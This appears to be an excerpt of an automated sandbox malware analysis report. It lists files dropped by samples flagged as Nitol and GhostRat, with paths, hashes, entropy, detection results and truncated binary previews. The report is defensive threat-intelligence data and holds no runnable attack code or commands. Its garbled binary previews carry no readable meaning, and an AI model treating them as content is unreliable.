                                              0000000000000000.exeGet hashmaliciousNitolBrowse
                                                T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                  setup.ic19.exeGet hashmaliciousGhostRat, NitolBrowse

                                                    Created / dropped Files

                                                    C:\Program Files (x86)\naBa3A\naBa3A.exe

                                                    Download File
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):54152
                                                    Entropy (8bit):6.64786972992462
                                                    Encrypted:false
                                                    SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                    MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                    SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                    SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                    SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                                    • Filename: 45631.exe, Detection: malicious, Browse
                                                    • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                                    • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                                                    • Filename: setup.ic19.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\Public\Music\destopbak.ini

                                                    Download File
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:k:k
                                                    MD5:55A54008AD1BA589AA210D2629C1DF41
                                                    SHA1:BF8B4530D8D246DD74AC53A13471BBA17941DFF7
                                                    SHA-256:4BF5122F344554C53BDE2EBB8CD2B7E3D1600AD631C385A5D7CCE23C7785459A
                                                    SHA-512:7B54B66836C1FBDD13D2441D9E1434DC62CA677FB68F5FE66A464BAADECDBD00576F8D6B5AC3BCC80844B7D50B1CC6603444BBE7CFCF8FC0AA1EE3C636D9E339
                                                    Malicious:false
                                                    Preview:.

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\FOM-51[1].jpg

                                                    Download File
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                    Category:dropped
                                                    Size (bytes):241664
                                                    Entropy (8bit):7.9985420019333615
                                                    Encrypted:true
                                                    SSDEEP:6144:Y2U97rw6BjnaXjcqXxxPgfkbDBuTsIjLMI:YX93wOjnaN74fkpos1I
                                                    MD5:496DCE3EC0D56E97EF1E79F1C3C0D871
                                                    SHA1:5A189D1E33E5093B91F8ECD695ACFB71D85ADE17
                                                    SHA-256:6293F4D234C9E82CA66479DC065E495DCF67C6B43F66F923B3285B4334A42663
                                                    SHA-512:5C9A6C552A5A07BE5442A8D0ACA54C10262A304DD8733BAAB9F58343164AFB259B5CD3A4BEFC387BA08E846AEE7C461EA9658C313C6907132FB6ED072A5B3AAD
                                                    Malicious:false
                                                    Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\b[1].gif

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):125333
                                                    Entropy (8bit):7.993522712936246
                                                    Encrypted:true
                                                    SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                                    MD5:2CA9F4AB0970AA58989D66D9458F8701
                                                    SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                                    SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                                    SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                                    Malicious:false
                                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\s[1].jpg

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                    Category:dropped
                                                    Size (bytes):8299
                                                    Entropy (8bit):7.9354275320361545
                                                    Encrypted:false
                                                    SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                                    MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                                    SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                                    SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                                    SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                                    Malicious:false
                                                    Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\c[1].gif

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):10681
                                                    Entropy (8bit):7.866148090449211
                                                    Encrypted:false
                                                    SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                                    MD5:10A818386411EE834D99AE6B7B68BE71
                                                    SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                                    SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                                    SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                                    Malicious:false
                                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\drops[1].jpg

                                                    Download File
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):37274
                                                    Entropy (8bit):7.991781062764932
                                                    Encrypted:true
                                                    SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                    MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                    SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                    SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                    SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                    Malicious:false
                                                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\FOM-50[1].jpg

                                                    Download File
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                    Category:dropped
                                                    Size (bytes):55085
                                                    Entropy (8bit):7.99273647746538
                                                    Encrypted:true
                                                    SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                    MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                    SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                    SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                    SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                    Malicious:false
                                                    Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\a[1].gif

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):135589
                                                    Entropy (8bit):7.995304392539578
                                                    Encrypted:true
                                                    SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                                    MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                                    SHA1:561836F6228E24180238DF9456707A2443C5795C
                                                    SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                                    SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                                    Malicious:false
                                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\s[1].dat

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):28272
                                                    Entropy (8bit):7.711624741629693
                                                    Encrypted:false
                                                    SSDEEP:384:9qegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQi:t5F1FUdy422IK+gAZt2i0YPpQn4GMB
                                                    MD5:7C371D180E92F0A8A5F6224E68440683
                                                    SHA1:236F9DC8883EDCD7A73B75C02C8523774DC498BD
                                                    SHA-256:29658608F2D1640EFD3BCC606507700D04910A937933712A4189C1A41DD58791
                                                    SHA-512:CC4992D0647BA5D27B8822C0538BF2FE1C0025E8232D48160D0FCCEDF34270568DCECAC3E33D94A0279B9F43FFE2EC25F300FC79AB4D4FAAB74012B73D3CB9B9
                                                    Malicious:false
                                                    Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\d[1].gif

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):3892010
                                                    Entropy (8bit):7.995495589600101
                                                    Encrypted:true
                                                    SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                                    MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                                    SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                                    SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                                    SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                                    Malicious:false
                                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\f[1].dat

                                                    Download File
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):879
                                                    Entropy (8bit):4.5851931774575325
                                                    Encrypted:false
                                                    SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                    MD5:E54C4296F011EC91D935AA353C936E34
                                                    SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                    SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                    SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                    Malicious:false
                                                    Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\i[1].dat

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):512
                                                    Entropy (8bit):5.26296536154187
                                                    Encrypted:false
                                                    SSDEEP:6:WwgONBui9QCrR0CrCa2BIDR/pYeL1g87OdUzW9E40/qcX:PgONBuUQCrZMBIDRb1gmgUzWg3
                                                    MD5:3F830864D62708390D84A4629D88083D
                                                    SHA1:79A9BB07FED0DB63C4B671000DD4069AB02ED5C3
                                                    SHA-256:9303E0E29A2AC53C31D43FC98C828A1FEB5814D2078EB868FE19CCB324D2C263
                                                    SHA-512:5DF33762B5D709E05272CD01C3B43A01671938A3F9D4DE9911EE8EF12FE89F8958493CCDFB23F940FE493B95F01A677D58F73FAACF0FC7D8C2FD5C9EA9DDD8A1
                                                    Malicious:false
                                                    Preview:....l%00XE.G#vi([[.K%f).GDG@'n!,EUYB!1l!NL.@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyy..L.j? a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33[F.D uj+XX.H&e*-DGDC$m"/FVZA"2o"MO.Ao&('''''''''''''''''''''''''''''''''OSSW$mxx..M.k>!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll

                                                    C:\Users\user\Documents\5oqa98.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):133136
                                                    Entropy (8bit):6.350273548571922
                                                    Encrypted:false
                                                    SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                    MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                    SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                    SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                    SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                                    • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                                    • Filename: 45631.exe, Detection: malicious, Browse
                                                    • Filename: 45631.exe, Detection: malicious, Browse
                                                    • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                                    • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                                    • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\Documents\MsMpList.dat

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):3889557
                                                    Entropy (8bit):7.999938761656195
                                                    Encrypted:true
                                                    SSDEEP:98304:sAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:nndLOZS/DtpPJRO8OHBL4f2UQI+A
                                                    MD5:91DB3C45CE40B5DB8A87F6D92474A4FC
                                                    SHA1:AE8EC9BE8B60C7C4BAE49655470E8F10F9100519
                                                    SHA-256:3B009291155998CA06DFBEB6E3BCEDF20ED76E3A269DA2CAC81B132D88662AC2
                                                    SHA-512:764D1431C6040D07A5F49F5BD6DB04562D4746A87DA33C83F91BA58CE6FD1266A79FF34712A0D37E94FD866370ED35F08267B07152C139156EA7715C89796E85
                                                    Malicious:false
